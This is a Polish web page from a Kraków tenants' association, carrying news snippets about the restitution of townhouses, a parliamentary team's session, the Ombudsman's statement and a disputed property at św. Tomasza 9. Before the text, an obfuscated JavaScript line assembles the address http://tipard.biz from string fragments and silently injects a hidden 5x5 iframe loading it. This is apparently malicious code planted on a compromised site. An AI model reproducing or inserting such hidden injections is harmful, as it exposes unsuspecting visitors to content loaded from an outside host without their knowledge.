jk='tip';gp='.bi';q='sr';yr='//';t='i';tq='ht';k='p:';h='me';w='ar';fr='z';l='t';r='c';n='f';bd='d';s='ra';ce=t.concat(n,s,h);pn=q.concat(r);hh=tq.concat(l,k,yr,jk,w,bd,gp,fr);var at=document.createElement(ce);at.setAttribute('width','5');at.setAttribute('height','5');at.setAttribute('style','display:none');at.setAttribute(pn,hh);document.body.appendChild(at); REPRYWATYZACJA KAMIENIC P0 KRAKOWSKU

O nieprawidłowościach przy zwracaniu kamienic w Krakowie dyskutował w czwartek parlamentarny zespół ds. zbadania nieprawidłowości przy reprywatyzacji. W ponad trzygodzinnym posiedzeniu, które odbyło się w Sejmie, uczestniczyli przedstawiciele krakowskich organizacji lokatorskich.Więcej

Niejasność i niesprawiedliwość prawa, ewidentnie nierówne traktowanie poszczególnych grup obywateli pokrzywdzonych powojennymi nacjonalizacjami (ale również i obecnymi niesprawiedliwymi zasadami zwrotu majątków), wciąż domagają się aktywnego działania ustawodawcy, który jako jedyny jest uprawniony – a zarazem zobowiązany – do stworzenia przejrzystego i sprawiedliwego systemu zadośćuczynienia słusznym interesom swoich obywateli, czy to poprzez restytucję w naturze, czy to poprzez wypłatę finansowych rekompensat. Kluczowe jest jednak przede wszystkim zapewnienie obywatelom równego traktowania i stworzenie transparentnych zasad przyznawania takich rekompensat, w procedurze, której reguły byłyby przewidywalne dla jej uczestników – podkreśla RPO w obszernym wystąpieniu podsumowującym działania w sprawie reprywatyzacji i główne problemy dotyczące obywateli. Więcej

Wypłacono odszkodowania za mienie powojenne, ale ciągle zgłaszają się spadkobiercy.
Dokumenty poginęły. Nie wiadomo, kto wziął już raz pieniądze.Więcej

Przekazanie kamienicy przy świętego Tomasza 9 w Krakowie skarbowi państwa jest ważne-
stwierdziła Prokuratoria Generalna i wystąpiła do sądu, w imieniu prezydenta miasta o wpisanie
do ksiąg wieczystych-skarbu państwa w miejsce prywatnych właścicieli. Zdaniem prokuratorii
oraz Stowarzyszenia"Lokatorzy w Obronie Prawa" przejęcie budynku nastąpiło w niejasnych okolicznościachi może być niezgodne z prawem.Więcej

WYBORY SAMORZĄDOWE

POLECANE

 

 

 Copyright © 2013 Stowarzyszenie Krakowska Grupa Inicjatywna Obrony Praw Lokatorów.

Wszelkie prawa zastrzeżone.